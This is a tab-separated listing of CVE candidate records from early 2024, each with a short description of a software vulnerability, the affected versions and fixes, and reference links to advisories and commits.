URL:https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541   |   MISC:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137   |   URL:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/semantics/types/subscriptable.py#L127-L137   |   MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-52xq-j7v9-v4v2    Assigned (20240125)
CVE    2024    24562    Candidate    vantage6-UI is the official user interface for the vantage6 server. In affected versions a number of security headers are not set. This issue has been addressed in commit `68dfa6614` which is expected to be included in future releases. Users are advised to upgrade when a new release is made. While an upgrade path is not available users may modify the docker image build to insert the headers into nginx.    MISC:https://github.com/vantage6/vantage6-UI/commit/68dfa661415182da0e5717bd58db3d00aedcbd2e   |   URL:https://github.com/vantage6/vantage6-UI/commit/68dfa661415182da0e5717bd58db3d00aedcbd2e   |   MISC:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-gwq3-pvwq-4c9w   |   URL:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-gwq3-pvwq-4c9w    Assigned (20240125)
CVE    2024    24561    Candidate    Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In versions 0.3.10 and earlier, the bounds check for slices does not account for the ability for start + length to overflow when the values aren't literals. If a slice() function uses a non-literal argument for the start or length variable, this creates the ability for an attacker to overflow the bounds check. This issue can be used to do OOB access to storage, memory or calldata addresses. It can also be used to corrupt the length slot of the respective array.    MISC:https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457   |   URL:https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457   |   MISC:https://github.com/vyperlang/vyper/issues/3756   |   URL:https://github.com/vyperlang/vyper/issues/3756   |   MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-9x7f-gwxq-6f2c    Assigned (20240125)
CVE    2024    24560    Candidate    Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. When calls to external contracts are made, we write the input buffer starting at byte 28, and allocate the return buffer to start at byte 0 (overlapping with the input buffer). When checking RETURNDATASIZE for dynamic types, the size is compared only to the minimum allowed size for that type, and not to the returned value's length. As a result, malformed return data can cause the contract to mistake data from the input buffer for returndata. When the called contract returns invalid ABIv2 encoded data, the calling contract can read different invalid data (from the dirty buffer) than the called contract returned.    MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686    Assigned (20240125)
CVE    2024    24559    Candidate    Vyper is a Pythonic Smart Contract Language for the EVM. There is an error in the stack management when compiling the `IR` for `sha3_64`. Concretely, the `height` variable is miscalculated. The vulnerability can't be triggered without writing the `IR` by hand (that is, it cannot be triggered from regular vyper code). `sha3_64` is used for retrieval in mappings. No flow that would cache the `key` was found so the issue shouldn't be possible to trigger when compiling the compiler-generated `IR`. This issue isn't triggered during normal compilation of vyper code so the impact is low. At the time of publication there is no patch available.    MISC:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586   |   URL:https://github.com/vyperlang/vyper/blob/c150fc49ee9375a930d177044559b83cb95f7963/vyper/ir/compile_ir.py#L585-L586   |   MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-6845-xw22-ffxv    Assigned (20240125)
CVE    2024    24558    Candidate    TanStack Query supplies asynchronous state management, server-state utilities and data fetching for the web. The `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint. To fix this issue, please update to version 5.18.0 or later.    MISC:https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1   |   URL:https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1   |   MISC:https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf   |   URL:https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf    Assigned (20240125)
CVE    2024    24557    Candidate    Moby is an open-source project created by Docker to enable software containerization. The classic builder cache system is prone to cache poisoning if the image is built FROM scratch. Also, changes to some instructions (most important being HEALTHCHECK and ONBUILD) would not cause a cache miss. An attacker with the knowledge of the Dockerfile someone is using could poison their cache by making them pull a specially crafted image that would be considered as a valid cache candidate for some build steps. 23.0+ users are only affected if they explicitly opted out of Buildkit (DOCKER_BUILDKIT=0 environment variable) or are using the /build API endpoint. All users on versions older than 23.0 could be impacted. The image build API endpoint (/build) and the ImageBuild function from github.com/docker/docker/client are also affected as they use the classic builder by default. Patches are included in 24.0.9 and 25.0.2 releases.    MISC:https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae   |   URL:https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae   |   MISC:https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc   |   URL:https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc    Assigned (20240125)
CVE    2024    24556    Candidate    urql is a GraphQL client that exposes a set of helpers for several frameworks. The `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream. To fix this vulnerability, upgrade to version 1.1.1.    MISC:https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d   |   URL:https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d   |   MISC:https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w   |   URL:https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w    Assigned (20240125)
CVE    2024    24549    Candidate    Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.    MISC:https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg   |   URL:https://lists.apache.org/thread/4c50rmomhbbsdgfjsgwlb51xdwfjdcvg    Assigned (20240125)
CVE    2024    24548    Candidate    Payment EX Ver1.1.5b and earlier allows a remote unauthenticated attacker to obtain the information of the user who purchases merchandise using Payment EX.    MISC:https://jvn.jp/en/jp/JVN41129639/   |   URL:https://jvn.jp/en/jp/JVN41129639/    Assigned (20240125)
CVE    2024    24543    Candidate    Buffer Overflow vulnerability in the function setSchedWifi in Tenda AC9 v.3.0, firmware version v.15.03.06.42_multi allows a remote attacker to cause a denial of service or run arbitrary code via crafted overflow data.    MISC:https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0130/setSchedWifi.md    Assigned (20240125)
CVE    2024    24539    Candidate    FusionPBX before 5.2.0 does not validate a session.    MISC:https://github.com/fusionpbx/fusionpbx/commit/2f8bed375c124c1d7e36138acc6903fcfcf15a8f   |   MISC:https://github.com/fusionpbx/fusionpbx/commit/ee202cd61dc9a79fb2d634b1ad21ff2416d531cb    Assigned (20240125)
CVE    2024    2453    Candidate    There is an SQL injection vulnerability in Advantech WebAccess/SCADA software that allows an authenticated attacker to remotely inject SQL code in the database. Successful exploitation of this vulnerability could allow an attacker to read or modify data on the remote database.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-081-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-081-01    Assigned (20240314)
CVE    2024    24525    Candidate    An issue in EpointWebBuilder 5.1.0-sp1, 5.2.1-sp1, 5.4.1 and 5.4.2 allows a remote attacker to execute arbitrary code via the infoid parameter of the URL.    MISC:https://l3v3lforall.github.io/EpointWebBuilder_v5.x_VULN/    Assigned (20240125)
CVE    2024    24524    Candidate    Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component.    MISC:https://github.com/harryrabbit5651/cms/blob/main/1.md    Assigned (20240125)
CVE    2024    24520    Candidate    An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.    MISC:http://lepton.com   |   MISC:https://github.com/xF9979/LEPTON-CMS    Assigned (20240125)
CVE    2024    24512    Candidate    Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the input subtitle component.    MISC:https://drive.google.com/file/d/1jRsltje5PRkgigcY5qLWB3GhF0e9j6aF/view?usp=sharing   |   MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-24512%20-%3E%20Stored%20XSS%20in%20input%20SubTitle%20of%20the%20Component    Assigned (20240125)
CVE    2024    24511    Candidate    Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the Input Title component.    MISC:https://drive.google.com/file/d/1IhU9tNhc6enKL1Dgq9--R05biJBjodKv/view?usp=sharing   |   MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-24511%20-%3E%20Stored%20XSS%20in%20input%20Title%20of%20the%20Component    Assigned (20240125)
CVE    2024    2450    Candidate    Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to correctly verify account ownership when switching from email to SAML authentication, allowing an authenticated attacker to take over other user accounts via a crafted switch request under specific conditions.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240314)
CVE    2024    24499    Candidate    SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtfullname and txtphone parameters in the edit_profile.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Update_Profile.md    Assigned (20240125)
CVE    2024    24498    Candidate    Unrestricted File Upload vulnerability in Employee Management System 1.0 allows a remote attacker to execute arbitrary code via the edit-photo.php component.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-Unauthenticated_Unrestricted_File_Upload_To_RCE.md    Assigned (20240125)
CVE    2024    24497    Candidate    SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Login.md    Assigned (20240125)
CVE    2024    24496    Candidate    An issue in Daily Habit Tracker v.1.0 allows a remote attacker to manipulate trackers via the home.php, add-tracker.php, delete-tracker.php, update-tracker.php components.    MISC:https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Broken_Access_Control.md    Assigned (20240125)
CVE    2024    24495    Candidate    SQL Injection vulnerability in delete-tracker.php in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via crafted GET request.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/DailyHabitTracker-SQL_Injection.md    Assigned (20240125)
CVE    2024    24494    Candidate    Cross Site Scripting vulnerability in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via the day, exercise, pray, read_book, vitamins, laundry, alcohol and meat parameters in the add-tracker.php and update-tracker.php components.    MISC:https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Stored_XSS.md    Assigned (20240125)
CVE    2024    2449    Candidate    A cross-site request forgery vulnerability has been identified in LoadMaster. It is possible for a malicious actor, who has prior knowledge of the IP or hostname of a specific LoadMaster, to direct an authenticated LoadMaster administrator to a third-party site. In such a scenario, the CSRF payload hosted on the malicious site would execute HTTP transactions on behalf of the LoadMaster administrator.    MISC:https://progress.com/loadmaster   |   URL:https://progress.com/loadmaster   |   MISC:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449   |   URL:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449    Assigned (20240314)
CVE    2024    24488    Candidate    An issue in Shenzhen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.    MISC:https://github.com/minj-ae/CVE-2024-24488    Assigned (20240125)
CVE    2024    24482    Candidate    Apktool before 2.9.3 on Windows allows ../ and /.. directory traversal.    MISC:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-vgwr-4w3p-xmjv    Assigned (20240125)
CVE    2024    2448    Candidate    An OS command injection vulnerability has been identified in LoadMaster. An authenticated UI user with any permission settings may be able to inject commands into a UI component using a shell command resulting in OS command injection.    MISC:https://progress.com/loadmaster   |   URL:https://progress.com/loadmaster   |   MISC:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449   |   URL:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449    Assigned (20240314)
CVE    2024    24479    Candidate    ** DISPUTED ** A Buffer Overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the wsutil/to_str.c, and format_fractional_part_nsecs components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.    FEDORA:FEDORA-2024-4115ab9959   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZT2BX7UARZVVWKITSZMHW7BHXGIKRSR2/   |   MISC:https://gist.github.com/1047524396/c50ad17e9a1a18990043a7cd27814c78   |   MISC:https://github.com/wireshark/wireshark/commit/c3720cff158c265dec2a0c6104b1d65954ae6bfd    Assigned (20240125)
CVE    2024    24478    Candidate    ** DISPUTED ** An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.    MISC:https://gist.github.com/1047524396/e82c55147cd3cb62ef20cbdb0ec83694   |   MISC:https://github.com/wireshark/wireshark/commit/80a4dc55f4d2fa33c2b36a99406500726d3faaef   |   MISC:https://gitlab.com/wireshark/wireshark/-/issues/19347    Assigned (20240125)
CVE    2024    24476    Candidate    ** DISPUTED ** A buffer overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the pan/addr_resolv.c, and ws_manuf_lookup_str(), size components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.    FEDORA:FEDORA-2024-4115ab9959   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZT2BX7UARZVVWKITSZMHW7BHXGIKRSR2/   |   MISC:https://gist.github.com/1047524396/369ba0ccffe255cf8142208b6142be2b   |   MISC:https://github.com/wireshark/wireshark/commit/108217f4bb1afb8b25fc705c2722b3e328b1ad78   |   MISC:https://gitlab.com/wireshark/wireshark/-/issues/19344    Assigned (20240125)
CVE    2024    24474    Candidate    QEMU before 8.2.0 has an integer underflow, and resultant buffer overflow, via a TI command when an expected non-DMA transfer length is less than the length of the available FIFO data. This occurs in esp_do_nodma in hw/scsi/esp.c because of an underflow of async_len.    MISC:https://gist.github.com/1047524396/5ce07b9d387095c276b1cd234ae5615e   |   MISC:https://github.com/qemu/qemu/commit/77668e4b9bca03a856c27ba899a2513ddf52bb52   |   MISC:https://gitlab.com/qemu-project/qemu/-/issues/1810    Assigned (20240125)
CVE    2024    24470    Candidate    Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component.    MISC:https://github.com/tang-0717/cms/blob/main/1.md    Assigned (20240125)
CVE    2024    24469    Candidate    Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the delete_post.php.    MISC:https://github.com/tang-0717/cms/blob/main/2.md    Assigned (20240125)
CVE    2024    24468    Candidate    Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the add_customblock.php.    MISC:https://github.com/tang-0717/cms/blob/main/3.md    Assigned (20240125)
CVE    2024    2446    Candidate    Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to limit the number of @-mentions processed per message, allowing an authenticated attacker to crash the client applications of other users via large, crafted messages.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240314)
CVE    2024    2445    Candidate    Mattermost Jira plugin versions shipped with Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to escape user-controlled outputs when generating HTML pages, which allows an attacker to perform reflected cross-site scripting attacks against the users of the Mattermost server.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240314)
CVE    2024    2443    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring GeoJSON settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13 and was fixed in versions 3.8.17, 3.9.12, 3.10.9, 3.11.7, and 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7   |   MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1   |   URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12    Assigned (20240313)
CVE    2024    2442    Candidate    Franklin Fueling System EVO 550 and EVO 5000 are vulnerable to a Path Traversal vulnerability that could allow an attacker to access sensitive files on the system.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-079-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-079-01    Assigned (20240313)
CVE    2024    24402    Candidate    An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component.    MISC:https://www.nagios.com/changelog/    Assigned (20240125)
CVE    2024    24401    Candidate    SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.    MISC:https://www.nagios.com/changelog/    Assigned (20240125)
CVE    2024    24399    Candidate    An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file.    MISC:https://github.com/capture0x/leptoncms/blob/main/README.md    Assigned (20240125)
CVE    2024    24398    Candidate    Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.    MISC:http://stimulsoft.com   |   MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R   |   MISC:https://cves.at/posts/cve-2024-24398/writeup/    Assigned (20240125)
CVE    2024    24397    Candidate    Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.    MISC:http://stimulsoft.com   |   MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R   |   MISC:https://cves.at/posts/cve-2024-24397/writeup/    Assigned (20240125)
CVE    2024    24396    Candidate    Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.    MISC:http://stimulsoft.com   |   MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R   |   MISC:https://cves.at/posts/cve-2024-24396/writeup/    Assigned (20240125)
CVE    2024    24393    Candidate    File Upload vulnerability in index.php in Pichome v.1.1.01 allows a remote attacker to execute arbitrary code via crafted POST request.    MISC:https://github.com/zyx0814/Pichome/issues/24    Assigned (20240125)
CVE    2024    24389    Candidate    A cross-site scripting (XSS) vulnerability in XunRuiCMS up to v4.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Column Name parameter.    MISC:https://j11zuc9f0h2.feishu.cn/docx/TXRmdIcH3ocn1WxuEQBcNPpjnLe    Assigned (20240125)
CVE    2024    24388    Candidate    Cross-site scripting (XSS) vulnerability in XunRuiCMS versions v4.6.2 and before allows remote attackers to obtain sensitive information via crafted malicious requests to the background login.    MISC:https://www.cnblogs.com/rxtycc/p/17948379    Assigned (20240125)
CVE    2024    24386    Candidate    An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder.    MISC:https://erickduarte.notion.site/VitalPBX-3-2-4-5-ee402173241c493687aa22ec60160c67?pvs=4   |   MISC:https://github.com/erick-duarte/CVE-2024-24386    Assigned (20240125)
CVE    2024    2438    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-47851. Reason: This candidate is a reservation duplicate of CVE-2023-47851. Notes: All CVE users should reference CVE-2023-47851 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240313)
CVE    2024    24377    Candidate    An issue in idocv v.14.1.3_20231228 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script.    MISC:https://zhuabapa.top/2024/01/18/idocv_20231228_rce/#more    Assigned (20240125)
CVE    2024    24375    Candidate    SQL injection vulnerability in Jfinalcms v.5.0.0 allows a remote attacker to obtain sensitive information via /admin/admin name parameter.    MISC:https://github.com/RiverGone/records/blob/main/JFinalcms-admin-admin-name.md    Assigned (20240125)
CVE    2024    2437    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-41728. Reason: This candidate is a reservation duplicate of CVE-2023-41728. Notes: All CVE users should reference CVE-2023-41728 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240313)
CVE    2024    24350    Candidate    File Upload vulnerability in Software Publico e-Sic Livre v.2.0 and before allows a remote attacker to execute arbitrary code via the extension filtering component.    MISC:https://gist.github.com/viniciuspinheiros/4e53b297fd6466cf12d01867ee1c9c33   |   MISC:https://medium.com/@viniciuspinheiros/e-sic-livre-2-0-authenticated-file-upload-leads-to-remote-code-execution-rce-5937c9537258    Assigned (20240125)
CVE    2024    24337    Candidate    CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to inject DDE commands into CSV exports via the 'Budget' and 'Patrons Member' components.    MISC:https://nitipoom-jar.github.io/CVE-2024-24337/    Assigned (20240125)
CVE    2024    24336    Candidate    Multiple cross-site scripting (XSS) vulnerabilities in the '/members/moremember.pl' and '/members/members-home.pl' endpoints within Koha Library Management System version 23.05.05 and earlier allow malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and 'Patrons Restriction' components.    MISC:https://nitipoom-jar.github.io/CVE-2024-24336/    Assigned (20240125)
CVE    2024    24333    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the desc parameter in the setWiFiAclRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/15/TOTOlink%20A3300R%20setWiFiAclRules.md    Assigned (20240125)
CVE    2024    24332    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the url parameter in the setUrlFilterRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/9/TOTOlink%20A3300R%20setUrlFilterRules.md    Assigned (20240125)
CVE    2024    24331    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setWiFiScheduleCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/13/TOTOlink%20A3300R%20setWiFiScheduleCfg.md    Assigned (20240125)
CVE    2024    24330    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the port or enable parameter in the setRemoteCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/14/TOTOlink%20A3300R%20setRemoteCfg.md    Assigned (20240125)
CVE    2024    2433    Candidate    An improper authorization vulnerability in Palo Alto Networks Panorama software enables an authenticated read-only administrator to upload files using the web interface and completely fill one of the disk partitions with those uploaded files, which prevents the ability to log into the web interface or to download PAN-OS, WildFire, and content images. This issue affects only the web interface of the management plane; the dataplane is unaffected.    MISC:https://security.paloaltonetworks.com/CVE-2024-2433   |   URL:https://security.paloaltonetworks.com/CVE-2024-2433    Assigned (20240313)
CVE    2024    24329    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md    Assigned (20240125)
CVE    2024    24328    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md    Assigned (20240125)
CVE    2024    24327    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pppoePass parameter in the setIpv6Cfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/7/TOTOlink%20A3300R%20setIpv6Cfg.md    Assigned (20240125)
CVE    2024    24326    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the arpEnable parameter in the setStaticDhcpRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/8/TOTOlink%20A3300R%20setStaticDhcpRules.md    Assigned (20240125)
CVE    2024    24325    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setParentalRules function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/11/TOTOlink%20A3300R%20setParentalRules.md    Assigned (20240125)
CVE    2024    24324    Candidate    TOTOLINK A8000RU v7.1cu.643_B20200521 was discovered to contain a hardcoded password for root stored in /etc/shadow.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20hard%20code.md    Assigned (20240125)
CVE    2024    24323    Candidate    SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the nickname, consignee, orderSN, orderStatusArray parameters of the AdminOrdercontroller.java component.    MISC:https://github.com/lousix/exp/blob/main/CVE-2024-24323/CVE-2024-24323.md    Assigned (20240125)
CVE    2024    24321    Candidate    An issue in Dlink DIR-816A2 v.1.10CNB05 allows a remote attacker to execute arbitrary code via the wizardstep4_ssid_2 parameter in the sub_42DA54 function.    MISC:http://dir-816a2.com   |   MISC:https://github.com/dkjiayu/Vul/blob/main/DIR816A2-dir_setWanWifi.md   |   MISC:https://www.dlink.com/   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240125)
CVE    2024    2432    Candidate    A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.    MISC:https://security.paloaltonetworks.com/CVE-2024-2432   |   URL:https://security.paloaltonetworks.com/CVE-2024-2432    Assigned (20240313)
CVE    2024    24311    Candidate    Path Traversal vulnerability in Linea Grafica "Multilingual and Multistore Sitemap Pro - SEO" (lgsitemaps) module for PrestaShop before version 1.6.6 allows a guest to download personal information without restriction.    MISC:https://security.friendsofpresta.org/modules/2024/02/06/lgsitemaps.html    Assigned (20240125)
CVE    2024    24310    Candidate    In the module "Generate barcode on invoice / delivery slip" (ecgeneratebarcode) from Ether Creation <= 1.2.0 for PrestaShop, a guest can perform SQL injection.    MISC:https://addons.prestashop.com/en/preparation-shipping/24123-generate-barcode-on-invoice-delivery-slip.html   |   MISC:https://security.friendsofpresta.org/modules/2024/02/20/ecgeneratebarcode.html    Assigned (20240125)
